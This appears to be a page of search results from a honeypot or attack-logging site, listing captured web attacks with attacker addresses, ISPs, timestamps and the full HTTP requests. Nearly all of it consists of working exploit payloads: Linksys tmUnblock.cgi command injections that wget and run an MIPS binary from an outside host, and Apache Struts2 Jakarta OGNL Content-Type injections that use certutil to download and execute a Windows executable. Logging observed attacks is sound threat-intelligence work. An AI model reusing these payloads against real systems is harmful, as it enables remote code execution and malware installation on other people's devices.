This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 3529 results (353 pages)

Linksys "The Moon" Worm

[Attack info]
Attacker: 221.213.121.104
Dest. port: 8080
Time: 05/10/2019 15:51:03
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Yunnan, Kunming
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: python-requests/2.20.0 Host: 192.168.0.14:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+wolf.mpsl%3B+wget+http%3A%2F%2F104.244.78.187%2Fbins%2Fwolf.mpsl%3B+chmod+777+wolf.mpsl%3B+.%2Fwolf.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEP

Linksys "The Moon" Worm

[Attack info]
Attacker: 221.13.203.135
Dest. port: 8080
Time: 10/08/2019 14:46:32
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Henan, Anyang
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: python-requests/2.20.0 Host: 159.89.182.124:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+jno.mpsl%3B+wget+http%3A%2F%2F159.89.182.124%2Fankit%2Fjno.mpsl%3B+chmod+777+jno.mpsl%3B+.%2Fjno.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

Linksys "The Moon" Worm

[Attack info]
Attacker: 221.13.203.135
Dest. port: 8080
Time: 09/07/2019 07:07:16
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Henan, Anyang
rDNS: hn.kd.smx.adsl
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: python-requests/2.20.0 Host: 159.89.182.124:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+jno.mpsl%3B+wget+http%3A%2F%2F159.89.182.124%2Fankit%2Fjno.mpsl%3B+chmod+777+jno.mpsl%3B+.%2Fjno.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 114.253.197.33
Dest. port: 8080
Time: 20/03/2019 14:58:27
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
GET /index.do HTTP/1.1 accept-language: zh-cn Host: 107.210.125.117:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://107.210.125.117:8080/index.do Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/sizwsblhnjsbwcr177.exe & cmd.exe /c C:/Windows/temp/sizwsblhnjsbwcr177.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 114.253.197.33
Dest. port: 8080
Time: 20/03/2019 14:58:26
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
GET /index.action HTTP/1.1 accept-language: zh-cn Host: 107.210.125.117:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://107.210.125.117:8080/index.action Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/sizwsblhnjsbwcr177.exe & cmd.exe /c C:/Windows/temp/sizwsblhnjsbwcr177.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 114.253.197.33
Dest. port: 8080
Time: 20/03/2019 14:58:25
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
GET /struts2-rest-showcase/orders.xhtml HTTP/1.1 accept-language: zh-cn Host: 107.210.125.117:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://107.210.125.117:8080/struts2-rest-showcase/orders.xhtml Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/sizwsblhnjsbwcr177.exe & cmd.exe /c C:/Windows/temp/sizwsblhnjsbwcr177.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 222.134.22.239
Dest. port: 8080
Time: 10/03/2019 05:22:24
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Shandong, Qingdao
GET /index.do HTTP/1.1 accept-language: zh-cn Host: 201.6.177.246:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://201.6.177.246:8080/index.do Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/rsknrjosxcmdgwz23121.exe & cmd.exe /c C:/Windows/temp/rsknrjosxcmdgwz23121.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 222.134.22.239
Dest. port: 8080
Time: 10/03/2019 05:22:23
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Shandong, Qingdao
GET /index.action HTTP/1.1 accept-language: zh-cn Host: 201.6.177.246:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://201.6.177.246:8080/index.action Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/rsknrjosxcmdgwz23121.exe & cmd.exe /c C:/Windows/temp/rsknrjosxcmdgwz23121.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}